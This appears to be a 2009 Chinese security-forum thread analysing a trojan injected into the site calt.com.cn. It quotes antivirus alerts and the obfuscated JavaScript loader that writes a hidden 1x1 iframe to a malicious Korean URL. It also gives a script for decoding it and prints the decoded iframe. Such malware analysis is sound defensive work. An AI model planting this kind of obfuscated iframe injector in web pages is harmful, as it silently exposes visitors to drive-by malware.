http://www.calt.com.cn/木马挂马[aarwwefdds]

hlx98007

hxxp://www.calt.com.cn/

xiaoxmj

病毒        2009-02-21  00:38:19        病毒在文件C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HY4CWGSY\calt_com_cn[1].htm中        JS.Downloader.cm.1984(JS脚本病毒)        处理成功（操作：删除）

ue100

晕，网站都被关了，说没备案

xxl

无法返回请求的网页

试图访问的网页：

http://www.calt.com.cn/

发生下列错误：

请求的对象被感染，发现下列病毒 Trojan-Clicker.HTML.IFrame.fh


如有疑问，请联系您的技术支持
创建日期：
Sat Feb 21 01:10:37 2009
Kaspersky Lab

eubyo

　请按照以下步骤进行icp备案工作：

       
如果您己备案成功，请您使用FTP将获取的电子证书basz.cert上传到网站根目录下新建的cert目录下，并将首页下载到本地添加备案号到明显位置并添加链接后上传到网站上。如果您的网站己因未备案而关闭，请您做完上传后联系我公司服务人员，确认上传无误后，我们会在一个工作日内开通。
联系人：曲雯艳 联系电话：010-62692880          

       
如果您还未进行ICP备案，请您登录到信息产业部网站http://www.miibeian.gov.cn/直接办理备案，具体流程请参见信产部ICP备案流程图，备案成功后按上述的第一条方法填写备案许可证号。          

       
如遗失备案用户名和密码的用户，需及时与公司注册所在省通信管理局联系，索取密码，要查询各省通信管理局联系电话，请登录www.miibeian.gov.cn网站查询。北京通信管理局电话：63310094          
                   
  如果您有任何疑问，可以与北京东方网景信息科技有限公司联系：
  东方网景ICP备案热线：010-62692880-1220
  技术支持热线：010-62692880-1600
  网站制作服务热线：010-62692880-1860
  东方网景免费提交备案信息网站：http://piw.east.net/icp
  信息产业部ICP/IP备案网站：http://www.miibeian.gov.cn/
  信息产业部关于发布《互联网站管理工作细则》的通告下载：
  http://www.miibeian.gov.cn/share ... nload.jsp?keyID=321

雨宫优子

挂马，而且很....


还是不悬赏了...


页面被加了行代码

function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!104!116!116!112!58!47!47!120!45!114!111!97!100!46!99!111!46!107!114!47!114!105!99!104!47!111!117!116!46!112!104!112!32!119!105!100!116!104!61!49!32!104!101!105!103!104!116!61!49!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}

这段代码，按理说应该alert(out)就行，不过这个似乎有点特殊...

1. String.fromCharCode

复制代码

还是这种类型


用以前祥子的输出法


把str=引号中的部分复制出来，然后将“!”换成“,”，并将最后的62,的“,”去掉

<html><script>
t=""
t=eval("String.fromCharCode("+t+")");
zzzz=(t);
var fso = new ActiveXObject("Scripting.FileSystemObject");
var f = fso.OpenTextFile("D:\\dec.txt", 2, true);
f.Write(zzzz);
f.Close();
fso = f = void(0);
window.onload = saveHtml;
</script></html>

然后将处理好的东西放入t=""中，保存为html格式，然后在浏览器里打开，会弹出是否允许交互的框，点允许，然后在D盘下找到D:\dec.txt，里面就是解密好的代码..

cchao21

解出一个网址<iframe src=hxxp://x-road.co.kr/rich/out.php width=1 height=1></iframe>

cchao21

将此段代码中!替换为 ,后，直接用10进制解也可以的。